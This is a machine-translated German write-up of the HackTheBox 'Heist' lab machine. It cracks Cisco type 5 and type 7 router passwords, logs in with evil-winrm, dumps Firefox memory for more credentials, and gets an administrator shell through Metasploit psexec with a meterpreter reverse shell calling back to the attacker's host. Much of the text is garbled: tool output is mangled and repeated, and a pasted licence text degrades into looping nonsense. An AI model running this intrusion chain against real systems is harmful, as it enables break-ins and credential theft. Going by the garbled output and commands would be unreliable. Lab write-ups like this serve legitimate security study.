Ich habe versucht, die verschlüsselten Passwörter (Typ 5, Typ 7) auf meinem Cisco -Gerät zu entziffern! HACKTHEBOX HEIST -Schreiben
Die URL wurde kopiert!
Dieses Mal werden wir versuchen, das auf dem Cisco -Gerät festgelegte Verschlüsselungskennwort zu knacken und in den Server einzubrechen. "HacktheBox-Heist: https://www.hackthebox.com/machines/heist "
Starten Sie zunächst den Zielgerät und überprüfen Sie die Ziel -IP -Adresse.
Scannen
Beginnen wir mit dem Scannen.
NMAP
Port -Scans werden mit NMAP durchgeführt.
┌── (hack_lab㉿desktop-o3rmu7h)-[~/hackthebox] └─ $ nmap -p--min-rate 10000 10.129.121.71 Start NMAP 7.94 (https://nmap.org) am 2023-09-12 09.16 JST NMAP-Report für 1023-09-12 09:16 JST NMAP-Report für 10.129-1212 09:16 JST NMAP-Report für 10.129-12121212.7. (0,33S Latenz). Nicht gezeigt: 65530 gefilterte TCP-Ports (No-Response) Port State Service 80/TCP Open HTTP 135/TCP Open MSRPC 445/TCP Open Microsoft-Ds 5985/TCP Open WSMAN 49669/TCP Open Unbekannte NMAP DEM: 1 IP-Adresse (1 Host) (1 Host) in 67.14 Sekunden Abgeordneter (1 Host) in 67.14 Sekunden Sekunden.
┌── (hack_lab㉿desktop-o3rmu7h)-[~/hackthebox] └─ $ NMAP-SC -SV -P 80,135,445,5985,49669 10.129.121.71 Start nmap 7.94 (https://nmap.org) AT 2023-09-209-209-209-209-20 Für 10.129.121.71 ist der Host erhöht (0,42S Latenz). Port State Service Version 80/TCP Open HTTP Microsoft IIS httpd 10.0 | Http-Cookie-Flags: | /: | PhpSessid: | _ Httponly Flag nicht gesetzt | HTTP-Methoden: | _ Potenziell riskante Methoden: Trace | http-title: Support-Anmeldeseite | _Requested Resource war login.php | _http-server-header: microsoft-iis/10.0 135/tcp öffnen msrpc microsoft Windows RPC 445/TCP Open Microsoft-DDs? 5985/TCP Öffnen Sie HTTP Microsoft httpapi httpd 2.0 (SSDP/UPNP) | _http-Title: Nicht gefunden | _http-server-header: microsoft-httpapi/2.0 49669/TCP Open MSRPC MICROSOFT FORNSROFT RPC-Service-Informationen: OS: OS: OS: OS: OS: OS: OS: CPE: CPE:/O: Microsoft: Windows Host Skript Ergebnisse: | _clock -skew: -1s | SMB2-Security-Modus: | 3: 1: 1: | _ Nachrichtensignalisierung aktiviert, aber nicht erforderlich | SMB2-Zeit: | Datum: 2023-09-12T00: 21: 17 | _ START_DATE: N/A Serviceerkennung durchgeführt. Bitte melden Sie falsche Ergebnisse unter https://nmap.org/submit/. NMAP Fertig: 1 IP -Adresse (1 Host -Up) gescannt in 107,46 Sekunden
Es scheint, dass HTTP, RPC, SMB und WinRM offen sind.
HAFEN
STATUS
SERVICE
80/TCP
offen
http
135/TCP
offen
MSRPC
445/TCP
offen
Microsoft-Ds
5985/TCP
offen
WSMAN
49669/TCP
offen
[unbekannt]
HTTP (80/TCP)
HTTP ist geöffnet, also überprüfen Sie es bitte. Es scheint, dass es hier eine Anmeldeseite gibt.
Ich habe ein paar Dinge ausprobiert, wie "admin: admin" und "admin: password", aber ich konnte mich nicht anmelden.
Es gibt einen "Login als Gast", also werde ich versuchen, mich beim Gast anzumelden.
Es gab einen Posten über den Cisco -Router und es gab eine Bindung.
Version 12.2 Kein Service Pad Service Passwort-Decryption! ISDN Switch-Typ Basic-5ess! Hostname iOS-1! Sicherheitskennwörter Min-Länge 12 Aktivieren Sie Geheimnis 5 $ 1 $ PDQG $ O8NRSZSGXEADUXRJLVKC91! Benutzername Rout3R Passwort 7 0242114b0e143f015f5d1e161713 Benutzername Admin -Privileg 15 Passwort 7 02375012182C1A1D751618034F36415408! IP SSH-Authentifizierungs-Retries 5 IP SSH Version 2! ! Router BGP 100 Synchronisation BGP log-neighbor-wechseln BGP Damening-Netzwerk 192.168.0.0 Mask 300.255.255.0 Timer BGP 3 9 Umverteilt angeschlossen! IP Classless IP Route 0.0.0.0 0.0.0.0 192.168.0.1! ! Access-List 101 IP IP jeder Dialer-Liste 1 Protokoll IP-Liste 101! Kein IP-HTTP-Server Kein IP HTTP Secure-Server! Zeile vty 0 4 Sitzungszeitout 600 Autorisierung ExecT SSH Transport Input SSH
Zugang erhalten
Lassen Sie uns die zuvor erwähnten Cisco Router -Informationen verwenden, um Zugriffsrechte zu erhalten.
Passwort knacken
Der Anhang enthält die folgende Aussage: Sie befindet sich im Cisco Typ 5 -Format.
Es ist nicht möglich, es zu dekodieren, da es durch den MD5 -Algorithmus, der in Enable Secret verwendet wird, gehasht wird. Ich werde es mit Brute Force versuchen, mit John the Ripper.
┌── (hack_lab㉿desktop-o3rmu7h)-[~/hackthebox] └─ $ John--Fork = 4 -w =/usr/sharif/wordlists/rockyou.txt Hashes Warnung: Detediertes Hash-Typ "md5crypt", aber der String ist auch als "md5crytypt-longongong"-md5cry-lonGerry-longong "-| Laden dieser Typen stattdessen mit Standardeingangscodierung: UTF-8 1 Kennwort-Hash (Md5Crypt, Krypta (3) $ 1 $ (und Varianten) [MD5 512/512 AVX512BW 16x3]) läuft 4 OpenMP-Threads pro Prozess (insgesamt 16 Process). Status Stealth1Agent (?) 3 1G 0: 00: 00: 17 DETT (2023-09-10 17:35) 0.05763G/S 50550p/S 50550C/S 50550C/S DAMPEN !!!! 52513c/s 2346256..2334364 Warten auf 3 Kinder, um 4 0g 0: 00: 00: 59 DEM (2023-09-10 17:36) 0G/S 40471P/S 40471C/S 40471C/S babybillie (202626 20g 0: 00: 01: 00 DORG): 01223-0g0g 0: 00: 01: 01223-0g0g 0: 00: 01: 01223-0g0g 0: 00: 01: 01223-23-0g 0: 00: 01: 00 DOD (2023-23-0g0g 0: 00: 01: 01-223- 17:36) 0G/S 54014P/S 54014C/S 54014C/S 1593572584561..1579468342 Verwenden Sie die Option "--how", um alle geknackten Passwörter zuverlässig abgeschlossen anzuzeigen.
Sie können sich mit "Hazard: Stealth1Agent" anmelden.
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox] └─$ smbclient -L \\\\\10.129.120.32 -U Hazard Password for [WORKGROUP\Hazard]: Sharename Type Comment ----- ---- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup Auflistung. do_connect: Verbindung zu 10.129.120.32 fehlgeschlagen (Fehler nt_status_io_timeout) kann keine Verbindung zu SMB1 herstellen - keine Arbeitsgruppe verfügbar
Sie können sich anmelden, aber da Sie mit SMBClient nicht auf die Aktien zugreifen können, scheint es keine bestimmten Informationen zu geben.
Ich werde versuchen, eine Verbindung mit RPCClient zu erreichen.
Der " Maschinen -SID " wird automatisch generiert, wenn Sie Ihren Computer einrichten. Der RID (Relative Identifier) des eingebauten Administrators ist auf "500" festgelegt und der Rill of Guest ist auf "501" festgelegt. Benutzer und Gruppen -RIDs werden in der Reihenfolge verwendet, beginnend mit 1000
Mit anderen Worten, wir werden versuchen, Benutzer mit SIDS von 1000 oder mehr zu überprüfen.
Infolgedessen können Sie sich auch mit Chase anmelden.
SMB 10.129.120.32 445 SupportDesk [+] SupportDesk \ Chase: Q4) SJU \ Y8QZ*A3? D.
Wenn Sie auf "Fehler: Ein Fehler des Typs httpclient :: forciVetimeouterror auftreten, wird die Nachricht abgelaufen", finden Sie hier!
Versuchen Sie, sich mit Evil-Winrm anzumelden.
┌── (hack_lab㉿desktop-o3rmu7h)-[~/hackthebox] └─ $ böse winrm -i 10.129.96.157 -U Chase -p 'q4) sju \ y8qz*a3? D' böse winrm v3.5 Warning: Remote-Path. In diesen Maschinendaten nicht konfiguriert: Weitere Informationen finden Sie unter Evil-winrm Github: https://github.com/hackplayers/evil-winrm#remote-path-completion Info: Feststellung der Verbindung zum Remote-Endpunkt * böse-winrm * ps
Ich konnte mich ohne Probleme anmelden! Hier gibt es User.txt, also geben Sie das Flag ein und Sie sind fertig.
* Evil-winrm* PS C: \ Benutzer \ Chase \ Desktop> LS-Verzeichnis: C: \ Benutzer \ Chase \ Desktop-Modus LastWritetime Längenname ---- ---- ---- ----- ----- --------------------------------------------------------------------------------------------------------------------------------------------------------- * Evil-winrm* PS C: \ Benutzer \ Chase \ Desktop> Cat todo.txt-Stuff To-Do: 1. Überprüfen Sie weiterhin die Liste der Probleme. 2. Fix die Router -Konfiguration. Fertig: 1. Eingeschränkter Zugriff für Gastbenutzer. * Evil-winrm* PS C: \ Benutzer \ Chase \ Desktop>
Erhebung des Privilegs
Ich werde weiterhin versuchen, solche Privilegien zu fördern.
Ist derjenige, der hier misstrauisch erscheint? Wenn Sie sich dies ansehen, ist es wahrscheinlich, dass Sie sich auf die Liste der Probleme auf Firefox befassen.
Geben Sie nach dem Hochladen Ihre Firefox -ID an und holen Sie sich die Müllkippe.
* Böse winrm* ps c: \ user \ chase \ desktop>. \ Procdump.exe -ma 6152 Firefox.dmp Procdump v11.0 -syssinternales prozess protoutility copyright SYSINTERNALS (eine häufige Tochtergesellschaft der Microsoft Corporation) und Sie. Bitte lesen Sie sie. Sie gelten für die Software, die Sie von techet herunterladen. Durch die Verwendung der Software akzeptieren Sie diese Begriffe. Wenn Sie sie nicht akzeptieren, verwenden Sie die Software nicht. Wenn Sie diese Lizenzbedingungen einhalten, haben Sie die unten stehenden Rechte. Installation und Benutzerrechte Sie können eine beliebige Anzahl von Kopien der Software auf Ihren Geräten installieren und verwenden. Lizenzumfang Die Software ist lizenziert und nicht verkauft. Diese Vereinbarung gibt Ihnen nur ein gewisses Recht, die Software zu nutzen. SYSINTERALS behält sich alle anderen Rechte vor. Unlohes Gesetz gibt Ihnen mehr Rechte Ziel. Diese Einschränkung können Sie die Software nur ausdrücklich wie ausdrücklich erlaubt. In dieser Vereinbarung müssen Sie dies nur für die Software einhalten. * Umgekehrter Ingenieur, Dekompilieren oder Zerlegen der Software, außer in dem Maße, in dem anwendbare Gesetze ausdrücklich in dieser Vereinbarung zulässig sind. In diesem Grund müssen Sie technische Einschränkungen in der Software einhalten, mit denen Sie sie nur auf bestimmte Weise verwenden können. *Umgekehrter Ingenieur, Dekompilieren oder Zerlegen der Software, außer in dem Maße, in dem anwendbare Recht in dieser Vereinbarung ausdrücklich zulässig ist. In diesem Grund müssen Sie technische Einschränkungen der Software einhalten, die es Ihnen nur auf bestimmte Weise verwenden. *Umgekehrter Ingenieur, Dekompilieren oder Zerlegen der Software, außer und nur in dem Maße, in dem anwendbares Gesetz in dieser Vereinbarung ausdrücklich zulässig ist. *Erstellen Sie mehr Kopien der Software als in dieser Vereinbarung angegeben oder nach geltendem Recht, Ziel dieser Einschränkung; *Veröffentlichen Sie die Software, damit andere kopieren können. *Die Software vermieten, mieten oder leihen; *Übertragen Sie die Software oder diese Vereinbarung an Dritte; oder *Verwenden Sie die Software für kommerzielle Software -Hosting -Dienste. Empfindliche Informationen Bitte beachten Sie, dass Dateien, die von SysInternals -Tools gespeichert sind, ähnlich wie andere Debug -Tools, die „Prozessstatus“ erfassen, persönlich identifizierbare oder andere sensible Informationen enthalten (wie Benutzernamen, Passwörter, Pfade zu Dateien, die auf Dateien zugegriffen wurden, und die Pfade zur Registrierung zugegriffen). Wenn Sie diese Software verwenden, werden Sie mit der Verantwortung. Verantwortung. Verantwortung. Verantwortung. Wenn Sie jedoch die Verantwortung für eine andere Verantwortung verantwortlich sind, müssen Sie sich verantwortlich machen, und Sie sind eine andere Verantwortung, die Sie verantwortlich sind, und die SOLE -Verantwortung, die Sie verantwortlich sind, oder Sie haben die Verantwortung für eine andere Verantwortung, die Sie verantwortlich sind, und Sie sind eine andere Verantwortung, oder Sie haben eine andere Verantwortung, die eine andere Verantwortung für die Verantwortung für eine andere Verantwortung, oder eine andere Verantwortung, die Sie verantwortlich machen. die Software. Dokumentation Jede Person, die einen gültigen Zugriff auf Ihr Computer oder Ihr internes Netzwerk hat, kann die Dokumentation für Ihre internen Referenzzwecke kopieren und verwenden. Exportbeschränkungen Die Software unterliegt den Exportgesetzen und -vorschriften der Vereinigten Staaten. Support -Dienste, da diese Software "wie es ist" ist, bieten wir möglicherweise keine Support -Dienste dafür an. Ganze Vereinbarung Diese Vereinbarung und die Bedingungen für Nahrungsergänzungsmittel, Aktualisierungen, im Internet basierende Dienste und Unterstützungsdienste, die Sie nutzen, sind die gesamte Vereinbarung für die Software- und Support -Dienste. Das geltende Recht der Vereinigten Staaten. Wenn Sie die Software in den Vereinigten Staaten erworben haben, regelt das Bundesstaat Washington die Auslegung dieser Vereinbarung und gilt für Verstöße gegen die Verstoß gegen die Grundsätze der Gesetzekonflikte. Die Gesetze des Staates, in dem Sie leben, regieren alle anderen Ansprüche, einschließlich Ansprüche im Rahmen des staatlichen Verbraucherschutzgesetzes, der unfairen Wettbewerbsgesetze und in der unerlaubten Handlung. Außerhalb der Vereinigten Staaten. Wenn Sie die Software in einem anderen Land erworben haben, gelten die Gesetze dieses Landes. Rechtliche Wirkung Diese Vereinbarung beschreibt bestimmte gesetzliche Rechtsrechte. Möglicherweise haben Sie andere Rechte nach den Gesetzen Ihres Landes. Möglicherweise haben Sie auch Rechte in Bezug auf die Partei, von der Sie die Software erworben haben. Diese Vereinbarung ändert Ihre Rechte nach den Gesetzen Ihres Landes nicht, wenn die Gesetze Ihres Landes dies nicht zulassen. Haftungsausschluss der Garantie Die Software ist "as - is" lizenziert. Sie tragen das Risiko, es zu verwenden. SYSINTERALS gibt keine ausdrücklichen Garantien, Garantien oder Bedingungen. Möglicherweise haben Sie zusätzliche Verbraucherrechte im Rahmen Ihrer örtlichen Gesetze, die diese Vereinbarung nicht ändern kann. In dem Ausmaß, das nach Ihren örtlichen Gesetzen zulässig ist, schließt Systemen die implementierten Gewährleistungen für Handelsfähigkeit, Fitness für einen bestimmten Zweck und Nichtverstoß aus. Einschränkung und Ausschluss von Abhilfemaßnahmen und Schäden, die Sie von den Systemen und seinen Lieferanten zurückerhalten können, nur direkte Schäden bis zu 5,00 US -Dollar. Sie können keine weiteren Schäden zurückerhalten, einschließlich Folge-, verlorener Gewinn-, Spezial-, indirekter oder zufälliger Schaden. Diese Einschränkung gilt für * alles, was mit der Software, Diensten, Inhalten (einschließlich Code) auf Internet -Websites Dritter oder Drittanbieterprogrammen zu tun hat. und * Ansprüche wegen Vertragsverletzung, Verstoß gegen Garantie, Garantie oder Bedingung, strenge Haftung, Fahrlässigkeit oder anderer unerlaubter Handlung in dem nach geltenden Recht zulässigen Umfang. Es gilt auch dann, wenn Systemunternale bekannt sind oder von der Möglichkeit der Schäden wissen sollen. Die obige Begrenzung oder Ausschluss kann nicht für Sie gelten, da Ihr Land möglicherweise nicht die Ausschluss oder Begrenzung von zufälligen, Folge- oder anderen Schäden zulässt. Bitte beachten Sie: Da diese Software in Quebec, Kanada, verteilt ist, sind einige der Klauseln in dieser Vereinbarung nachstehend in Französisch bereitgestellt. Remarque: Das CE Logiel ist eine Folge der Fournies - den Fournies der Fournies. Exonération de garantie.Leave Logiciel Visé Par unE Lizenz «Tel Quel» .Toute Nutzung de Ce Die Behörden sind nicht in der Lage, das System zum Schutz der lokalen Regierung zu nutzen. Die Behörden können nicht in einer Weise auf das System zugreifen, die für die lokale Regierung zum Schutz der lokalen Regierung erforderlich ist. Dommages - Intérêts ET -Ausschluss de Reaktionsabilitation Pour Les Dommages. Vous pouvez obtenir de sysinternals et de sess fournissesurs une freiwilligernd und domiten lenkt die Einzigartigkeit à Hauteur de 5,00 $ us. Vous pouvez prétendre à aucune entschädigt pour les autres, y komplimente dommungen spéciaux, indirects accessoires et pertes de bénéfices. Cette -Begrenzungsprobleme: Werbung für Dienste, Dienstleistungen, die Contgenuation (Y -Komplementär -Code) mit Figuren -SUR -Websites Internetstufen bilden, basieren auf den Programmen. Das Unternehmen bezahlt, um das Leben der Menschen und die Menschen, die sich auf die Menschen beschränken, die ihr Leben einschränken, einzuschränken. Effet Juridique. Weniger Kontrast décrit bestimmte Droits. Vous pourriez avoir d'Aumres droits prévus par les les les les de votre zahlt. Dies ist der erste Lauf dieses Programms. Sie müssen EULA akzeptieren, um fortzufahren. Verwenden Sie -accepteula, um EULA zu akzeptieren.
Wenn es so weitergeht, scheint es nicht möglich zu sein. Zunächst bitten sie Sie, -Akzepteula zu tun.
* Böse winrm* ps c: \ user \ chase \ desktop> ./procdump.exe -accepteula procdump v11.0 -sysinternals process Dump Utility Copyright (C) 2009-2022 Mark Russsinovich und Andrew Richards Syssintern -www.sysysysysysysys. Ausnahme.
Jetzt werde ich versuchen, einen weiteren Müllkippe zu bekommen.
Überprüfen Sie die Parameter, die Sie in Optionen einstellen müssen.
MSF6> Verwenden Sie Exploit/Windows/SMB/PSEXEC [*] Kein Nutzlast konfiguriert, defasiert auf Windows/MeterPreter/Reverse_tcp MSF6 Exploit (Windows/SMB/PSEXEC)> Optionen Optionen Moduloptionen (Exploit/Windows/SMB/PSEXEC): Name Aktuelle Einstellung für die erforderliche Beschreibung der erforderlichen Einstellung --- ------------------------------------------------------------------------------------------------------------------------------------------------------- Service_description Keine Dienstbeschreibung, die für hübsches Listing Service_Display_Name nein verwendet werden soll. Der Service -Name service_name Nein Der Service -Name Smbdomain. Nein, die Windows-Domain für Authentifizierung SMBPass Nein Das Kennwort für den angegebenen Benutzernamen smbShare Nein. --------------------------------------------------------------------------------------------------------------------------------------------------------- Ziel: ID-Name----- 0 Automatische Ansicht Die vollständigen Modulinformationen mit dem Befehl Info oder Info -d.
Sobald die Parameter eingestellt sind, versuchen Sie es. Wenn es erfolgreich ist, konnte ich Privilegien durch Eingabe von Muscheln eskalieren!
MSF6 Exploit (Windows/Smb/psexec)> Ausführen [*] startete umgekehrter TCP -Handler am 10.10.16.6:4444 [*] 10.129.96.157:445 - Verbindung mit dem Server ... [*] 10.129.96.157:445 - Authentikatik mit 10.129.96.157:45: 10.129.96.157:445 - Selecting PowerShell target [*] 10.129.96.157:445 - Executing the payload... [+] 10.129.96.157:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 10.129.96.157 [*] Meterpreter Sitzung 1 eröffnet (10.10.16.6:4444-> 10.129.96.157:49686) unter 2023-09-12 08:06:48 +0900 Meterpreter> Shell Process 4760 Erstellt. Kanal 1 erstellt. Microsoft Windows [Version 10.0.17763.437] (C) 2018 Microsoft Corporation. Alle Rechte vorbehalten. C: \ Windows \ System32> CD \ Benutzer \ Administrator CD \ Benutzer \ Administrator C: \ Benutzer \ Administrator> CD -Desktop -CD -Desktop C: \ Benutzer \ Administrator \ Desktop> DIR -DIR -Lautstärke im Laufwerk C hat kein Etikett. Die Seriennummer des Volumens ist FA65-CD36-Verzeichnis von C: \ Users \ Administrator \ Desktop 02/18/2021 16:00 Uhr<DIR> . 18.02.2021 16:00 Uhr<DIR> .. 09/12/2023 04:11 AM 34 root.txt 1 Datei (s) 34 Bytes 2 Dir (s) 3,738,165,248 Bytes kostenlos c: \ user \ administrator \ Desktop> Cat root.txt cat root.txt 'Cat' wird nicht als interner oder externer Befehl oder externer Befehl oder externer Befehl, Operationsprogramm, Operationsprogramm, Operationsprogramm, Operable -Programm, ORTERABLE -DATEL ERKLISIERT, ORTERALS -ARBEUTUNG, BOCH -DATEL. C: \ Benutzer \ Administrator \ Desktop> type root.txt type root.txt
Zusammenfassung
Dieses Mal habe ich das auf meinem Cisco -Gerät festgelegte Verschlüsselungskennwort geknackt und versucht, in den Server einzudringen. Es ist ein bisschen aufregend darüber nachzudenken, wie es möglich ist, vertraute Produkte zu hacken! ! (Lol)
Dies ist ein Blog, in dem ich angefangen habe, Informationssicherheit zu studieren. Als neuer Angestellter würde ich mich freuen, wenn Sie mit einem breiten Herzen schauen könnten. Es gibt auch Teech Lab, das eine Gelegenheit ist, Programmierspaß zu studieren. Wenn Sie also an der Softwareentwicklung interessiert sind, sollten Sie sich unbedingt ansehen!
Pochip
![[HacktheBox] Was zu tun ist, wenn "ein Fehler des Typs httpclient :: forciVetimeouterror passiert ist](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306] Ich habe den gemeinsam genutzten Samba aufgezählt, eine verletzliche Version von ProfTPD manipuliert und die Privilegien durch Manipulation von Pfadvariablen eskaliert! Tryhackme Kenobi schreiben](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[Permanent CTF für Anfänger] Setodanote CTF -Webschreiben! Empfohlen, um ein Gefühl von CTF zu bekommen!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[Tryhackme] Wir haben Paketanalyse mit Wireshark durchgeführt, um das Eindringen von SSH-Backdoor zu untersuchen! Überführung2 schreiben](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-300x169.jpg)
![[CVE-2018-16763] Kraftstoff CMS 1.4.1-Ich habe die Ausführung der Remote-Code (1) in Python 3 konvertiert und gehackt! Tryhackme Ignite schreiben](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[Tryhackme] Ich habe SSH2John verwendet, um den Hash aus dem privaten Schlüssel zu extrahieren und das Passwort mit John the Ripper zu gehackt! Überführungsverschreibung](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[Tryhackme] Ich habe versucht, eine Windows -Maschine mit einem Ret2esp -Angriff (Pufferüberlauf) zu infiltrieren! Brainstorming schreiben](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)
![[CVE-2019-9053] Ich habe versucht, es mit der SQL-Injektionsanfälligkeit in CMS zu hacken! (Python3) Tryhackme Einfache CTF -Beschreibung](https://hack-lab-256.com/wp-content/uploads/2023/05/hack-lab-256-samnail-22-300x169.jpg)